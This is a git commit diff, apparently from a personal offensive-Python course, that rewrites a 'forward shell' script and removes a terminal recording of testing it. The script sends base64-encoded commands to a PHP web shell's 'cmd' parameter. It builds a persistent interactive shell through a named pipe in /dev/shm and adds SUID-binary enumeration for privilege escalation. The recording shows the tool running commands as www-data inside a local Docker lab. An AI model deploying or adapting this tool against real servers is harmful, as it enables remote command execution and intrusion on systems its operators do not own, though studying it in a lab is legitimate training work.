Compare commits

...

2 Commits

Author SHA1 Message Date
d7252c6782 Update forwardshell script 2024-02-03 12:28:27 +01:00
d4c5d8a50f wip 2024-02-03 12:27:47 +01:00
3 changed files with 154 additions and 190 deletions

View File

@ -11,24 +11,32 @@ mkfifo input; tail -f input | /bin/sh 2>&1 > output
""" """
import requests import requests
import signal import time
import sys
from termcolor import colored from termcolor import colored
from base64 import b64encode from base64 import b64encode
from random import randrange
def def_handler(sig, frame):
print(colored("\n[!] Exiting...", "blue"))
sys.exit(1)
signal.signal(signal.SIGINT, def_handler) class ForwardShell:
main_url = "http://localhost/index.php" def __init__(self):
session = randrange(100000, 999999)
def run_command(command): self.main_url = "http://localhost/index.php"
self.stdin = f"/dev/shm/{session}.input"
self.stdout = f"/dev/shm/{session}.output"
self.help_options = {
'enum suid': 'FileSystem SUID Privileges Enumeration',
'help': 'Show this help panel',
}
self.is_pseudo_terminal = False
def run_command(self, command):
command = b64encode(command.encode()).decode() command = b64encode(command.encode()).decode()
@ -36,16 +44,112 @@ def run_command(command):
'cmd': 'echo "%s" | base64 -d | /bin/sh' % command 'cmd': 'echo "%s" | base64 -d | /bin/sh' % command
} }
r = requests.get(main_url, params=data) try:
r = requests.get(self.main_url, params=data, timeout=5)
return r.text return r.text
except:
pass
if __name__ == '__main__': return None
def write_stdin(self, command):
command = b64encode(command.encode()).decode()
data = {
'cmd': 'echo "%s" | base64 -d > %s' % (command, self.stdin)
}
r = requests.get(self.main_url, params=data)
def read_stdout(self):
for _ in range(5):
read_stdout_command = f"/bin/cat {self.stdout}"
output_command = self.run_command(read_stdout_command)
time.sleep(0.2)
return output_command
def setup_shell(self):
command = f"mkfifo {self.stdin}; tail -f {self.stdin} | /bin/sh 2>&1 > {self.stdout}"
self.run_command(command)
def remove_data(self):
remove_data_command = f"/bin/rm {self.stdin} {self.stdout}"
self.run_command(remove_data_command)
def clear_stdout(self):
clear_stdout_command = f"echo '' > {self.stdout}"
self.run_command(clear_stdout_command)
def run(self) -> None:
self.setup_shell()
while True: while True:
command = input(colored("> ", "yellow")) command = input(colored("> ", "yellow"))
output_command = run_command(command)
if "script /dev/null -c bash" in command:
print(
colored("[+] Se ha iniciado una pseudo-terminal", "blue"))
self.is_pseudo_terminal = True
if command.strip() == "enum suid":
command = f"find / -perm -4000 2>/dev/null | xargs ls -l"
if command.strip() == "help":
print(colored(f"\n[+] Listando panel de ayuda:\n", "blue"))
for key, value in self.help_options.items():
print(f"\t{key} - {value}")
continue
self.write_stdin(command + "\n")
output_command = self.read_stdout()
if command.strip() == "exit":
self.is_pseudo_terminal = False
print(colored("[+] Se ha cerrado la pseudo-terminal", "blue"))
self.clear_stdout()
continue
if self.is_pseudo_terminal:
lines = output_command.split("\n")
if len(lines) == 1:
cleared_output = '\n'.join([lines[-1]] + lines[:1])
elif len(lines) > 1:
cleared_output = '\n'.join(
[lines[-1]] + lines[:1] + lines[2:-1])
else:
print(len(lines))
print(lines)
print(cleared_output + "\n")
else:
print(output_command) print(output_command)
self.clear_stdout()

View File

@ -0,0 +1,29 @@
#!/usr/bin/env python3
"""
Fichero principal de la aplicación.
"""
import signal
import sys
from forwardshell import ForwardShell
from termcolor import colored
def def_handler(sig, frame) -> None:
print(colored("\n[!] Exiting...", "blue"))
my_forward_shell.remove_data()
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
if __name__ == '__main__':
my_forward_shell = ForwardShell()
my_forward_shell.run()

View File

@ -1,169 +0,0 @@
Script started on 2024-02-02 18:20:04+01:00 [TERM="xterm-256color" TTY="/dev/pts/1" COLUMNS="106" LINES="53"]
 
7🐧 ~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs at ⚡ 18:20:04
 [?2004h[?25l8]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs]1;..hacking/12_fs]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs\%  
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES at ⚡ 18:20:04
 [?1h=[?25h[?2004h[?25l 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115[?25h[?25l 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:04
 🏠 192.168.1.115 📡 192.145.39.55[?25hscriptscript/[?1l>[?25l[?2004l  script/[?25h
]2;script/]1;script/% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:09
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004h##!#!//uussrr//bbiinn//eennvv  ppyytthhoonn3[?1l>[?25l[?2004l  #!/usr/bin/env python3[?25h
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:30
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hccurl -s -X GET 'http://localhost/' -G --data-urlencode 'cmd=cat /etc/resolv.conf 2>&1'co🏠 192.168.1.115 📡 192.145.39.55de index.htmlcoddd           d e index.htmlcode f         irmaMail-Prefapp.htmlo                    rwat rdshell.py[?1l>[?25l[?2004l  code forwardshell.py[?25h
]2;code forwardshell.py]1;code% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:20:44
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hppyinstaller --noconsole --onefile backdoor.pypy                                           listener.pyf          irefox_decrypt.pyfo                orrwardshell.py  [?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;pywww-data
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:23:42
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> cat
/
^CTraceback (most recent call last):
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 23, in <module>
output_command = run_command(command)
File "/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/forwardshell.py", line 14, in run_command
r = requests.get(main_url, params=data)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 73, in get
return request("get", url, params=params, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 587, in request
resp = self.send(prep, **send_kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/sessions.py", line 701, in send
r = adapter.send(request, **kwargs)
File "/home/v/.local/lib/python3.10/site-packages/requests/adapters.py", line 489, in send
resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 700, in urlopen
httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 446, in _make_request
six.raise_from(e, None)
File "<string>", line 3, in raise_from
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request
httplib_response = conn.getresponse()
File "/usr/lib/python3.10/http/client.py", line 1375, in getresponse
response.begin()
File "/usr/lib/python3.10/http/client.py", line 318, in begin
version, status, reason = self._read_status()
File "/usr/lib/python3.10/http/client.py", line 279, in _read_status
line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
File "/usr/lib/python3.10/socket.py", line 705, in readinto
return self._sock.recv_into(b)
KeyboardInterrupt
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/gi/p/curso-python/python-o/15/12/script on ☕ main ?1
 🏠 192.168.1.115 📡 192.145.39.55[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> whoami
www-data
> cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.2 2f2f81768a05
> pwd
/var/www/html
> ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.55[?1h=[?2004h[?25l 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 7m 18s 🔒 ES vpn at ⚡ 18:34:09
 🏠 192.168.1.112 📡 192.145.39.54[?25hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 6s 🔒 ES vpn at ⚡ 18:35:25
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> exit
> ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:02
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hpy forwardshell.py[?1l>[?25l[?2004l  py forwardshell.py[?25h
]2;python3 forwardshell.py]1;py> exit
> ls
index.php
> e ^C
[!] Exiting...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 10s 🔒 ES vpn at ⚡ 18:36:36
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hppy forwardshell.pyph                php --interactive[?1l>[?25l[?2004l  php --interactive[?25h
]2;php --interactive]1;phpzsh: command not found: php
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:36:56
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hdd exec -it 2f2 bashdo                 cker portdocckkedocker e   xec -it 0fc1 shxec -it 0fc1 sh[?1l>[?25l[?2004l  docker exec -it 0fc1 sh[?25h
]2;docker exec -it 0fc1 sh]1;dockerError response from daemon: No such container: 0fc1
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:37:09
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hddocker exec -it 0fc1 shd                      exec -it 2f2 bashexec -it 2f2 bash[?1l>[?25l[?2004l  d exec -it 2f2 bash[?25h
]2;docker exec -it 2f2 bash]1;droot@2f2f81768a05:/var/www/html# php --version
PHP 7.0.33 (cli) (built: Dec 29 2018 06:50:58) ( NTS )
Copyright (c) 1997-2017 The PHP Group
Zend Engine v3.0.0, Copyright (c) 1998-2017 Zend Technologies
root@2f2f81768a05:/var/www/html# php --interactive
Interactive shell
php > exit
root@2f2f81768a05:/var/www/html# e exit
exit
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1 took 1m 55s 🔒 ES vpn at ⚡ 18:39:09
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hmmkdir scriptmkmkddimkdir c     atch-all/01_scripts_descifrador_wargame.pyi                                         bnc    atch-all/01_scripts_descifrador_wargame.pyo                                         mandos-peladon            cepto[?1l>[?25l[?2004l  mkdir concepto[?25h
]2;mkdir concepto]1;mkdir% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:39:33
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hllsls[?1l>[?25l[?2004l  ls[?25h
]2;ls --color=tty]1;lsconcepto forwardshell.py
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script]1;../12_fs/script]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script\ 
🐧 ~/Doc/p/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script on ☕ main ?1  🔒 ES vpn at ⚡ 18:39:33
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hccode forwardshell.pycocon                 catenadas="hola $kease"ncce                     epconcepto/o [?1l>[?25l[?2004l  concepto[?25h
]2;concepto]1;concepto% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1  🔒 ES vpn at ⚡ 18:39:36
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hmmkdir conceptomkmkf           ifo --helpfiifmkfifo i     npyt;    ut;t  ttaaitail -f inop  put | //bbi/binn//bin/s/bin/sh 22>>&1 Z > ouputtput[?1l>[?25l[?2004l  mkfifo input; tail -f input | /bin/sh 2>&1 > output[?25h
]2;mkfifo input; tail -f input | /bin/sh 2>&1 > output]1;mkfifo^C
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1 х INT took 7m 34s 🔒 ES vpn at ⚡ 18:48:03
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hcconceptoca      t ../09_keylogger/.env | pbcopycat o                            utput.pcap | wc -louutput              [?1l>[?25l[?2004l  cat output[?25h
]2;cat output]1;catv
/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto
/home/v
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1  🔒 ES vpn at ⚡ 18:48:11
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004hcat outputls       cat outputecho "whoami" > inputcat output         ls       cat outputecho "pwd" > inputcat output       ls       cat outputecho "whoami" > inputcat output         ls       cat outputls       cat output         mmkfifo input; tail -f input | /bin/sh 2>&1 > outputmkmkd                                                ir conceptomk            fifo input; tail -f input | /bin/sh 2>&1 > outputmkfmkfifo input; tail -f input | /bin/sh 2>&1 > output[?1l>[?25l[?2004l  mkfifo input; tail -f input | /bin/sh 2>&1 > output[?25h
]2;mkfifo input; tail -f input | /bin/sh 2>&1 > output]1;mkfifomkfifo: no sha pogut crear la cua FIFO 'input': El fitxer ja existeix
/bin/sh: 5: probando: not found
^C
Session terminated, killing shell...
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto on ☕ main ?1 х INT took 4m 51s 🔒 ES vpn at ⚡ 18:53:13
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004h ...killed.
[?25l  [?25h[?2004l
% ]2;v@victus:~/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto]1;..ript/concepto]7;file://victus/home/v/Documents/projectes/git/personal/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto\ 
🐧 ❌ ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto х INT 🔒 ES vpn at ⚡ 22:59:38
 🏠 192.168.1.112 📡 192.145.39.54[?1h=[?2004h 
🐧 ❌ ~/Doc/p/gi/p/curso-python/python-ofensivo/15_hacking/12_fs/script/concepto х INT 🔒 ES vpn at ⚡ 22:59:38
 🏠 192.168.1.112 📡 192.145.39.54eecho "whoami" > inputex                   itexiexit[?1l>[?25l[?2004l  exit[?25h
]2;exit]1;exit
Script done on 2024-02-02 23:00:00+01:00 [COMMAND_EXIT_CODE="130"]